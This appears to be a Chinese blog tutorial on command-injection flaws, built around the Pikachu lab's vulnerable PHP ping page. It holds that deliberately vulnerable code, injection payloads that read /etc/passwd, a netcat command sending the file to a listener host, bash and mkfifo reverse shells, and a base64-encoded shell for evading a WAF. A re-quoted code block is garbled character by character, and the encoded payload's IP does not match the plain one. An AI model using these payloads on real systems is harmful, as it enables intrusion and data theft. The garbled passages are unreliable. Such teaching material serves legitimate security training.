命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞
相关函数
system(args)有回显
passthru(args)有c
exec(args)回显最后一行-必须echo输出
shell_exec()无回显必须输出
代码分析
<?php
/**
* Created by runner.han
* There is nothing new under the sun
*/
$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
if ($SELF_PAGE = "rce_ping.php"){
$ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}
$PIKA_ROOT_DIR = "../../";
include_once $PIKA_ROOT_DIR . 'header.php';
//header("Content-type:text/html; charset=gbk");
$result='';
if(isset($_POST['submit']) && $_POST['ipaddress']!=null){
$ip=$_POST['ipaddress'];
// $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位和第四位1-255,中间两位0-255
if(stristr(php_uname('s'), 'windows')){
// var_dump(php_uname('s'));
$result.=shell_exec('ping '.$ip);//直接将变量拼接进来,没做处理
}else {
$result.=shell_exec('ping -c 4 '.$ip);
}
}
?>
<div class="main-content">
<div class="main-content-inner">
<div class="breadcrumbs ace-save-state" id="breadcrumbs">
<ul class="breadcrumb">
<li>
<i class="ace-icon fa fa-home home-icon"></i>
<a href="rce.php">rce</a>
</li>
<li class="active">exec "ping"</li>
</ul><!-- /.breadcrumb -->
<a href="#" style="float:right" data-container="body" data-toggle="popover" data-placement="bottom" title="tips(再点一下关闭)"
data-content="想一下ping命令在系统上是怎么用的">
点一下提示~
</a>
</div>
<div class="page-content">
<div id="comm_main">
<p class="comm_title">Here, please enter the target IP address!</p>
<form method="post">
<input class="ipadd" type="text" name="ipaddress" />
<input class="sub" type="submit" name="submit" value="ping" />
</form>
<?php
if($result){
echo "<pre>{$result}</pre>";
}
?>
</div>
</div><!-- /.page-content -->
</div>
</div><!-- /.main-content -->
<?php
include_once $PIKA_ROOT_DIR . 'footer.php';
?>
这里可以看到参数ipaddress直接拼接到命令中执行没有任何的过滤
if(isset($_POST[‘submit’]) && $_POST[‘ipaddress’]!=null){
i
p
=
ip=
ip=_POST[‘ipaddress’];
// $check=explode(’.’, $ip);可以先拆分,然后校验数字以范围,第一位和第四位1-255,中间两位0-255
if(stristr(php_uname(‘s’), ‘windows’)){
// var_dump(php_uname(‘s’));
r
e
s
u
l
t
.
=
s
h
e
l
l
e
x
e
c
(
′
p
i
n
g
′
.
result.=shell_exec('ping '.
result.=shellexec(′ping′.ip);//直接将变量拼接进来,没做处理
}else {
r
e
s
u
l
t
.
=
s
h
e
l
l
e
x
e
c
(
′
p
i
n
g
−
c
4
′
.
result.=shell_exec('ping -c 4 '.
result.=shellexec(′ping−c4′.ip);
}
}
命令执行漏洞攻击
;(分号)
命令按照顺序(从左到右)被执行,并且可以用分号进行分隔。当有一条命令执行失败时,不会中断其它
命令的执行。
ping -c 1 127.0.0.1;cat /etc/passwd
如果是win系统 可以读取 c:\windows\win.ini
命令执行漏洞可以直接使用&&或者|和管道命令执行其他命令
命令链接符号解析
| (管道符号)
通过管理符 可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命
令
远程命令执行传递文件
如果目标存在netcat,可以使用命令读取文件保存到远程服务器上
远程服务器上监听命令
nc -lp 9999>passwd
本地执行命令
nc ip 9999 </etc/passwd
会在查看远程服务器生成passwd文件
在kali上开启监听
执行命令
| nc 192.168.1.12 9999 < /etc/passwd
会在远程服务器生成一个passwd文件内容就是/etc/passwd里面的内容
反弹shell命令
远程服务器监听命令
nc -vlnp 8080
bash shell执行
| /bin/bash -c ‘bash -i >& /dev/tcp/192.168.1.12/8080 0>&1’
另一种反弹shell方法通过管道符命令
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
如果有 waf 进行连接,可以把语句进行 base64 加密后,因为加密后的字符串没有触发拦截规则,再利用
shell 命令再进行解码
bash -i >& /dev/tcp/192.168.0.103/8080 0>&1
base64 编码后 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzgwODAgMD4mMQ==
受害者执行
echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTMzLzgwODAgMD4mMQ==”|base64 -d|bash
远程服务器监听
nc -lvvp 8080
1306
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
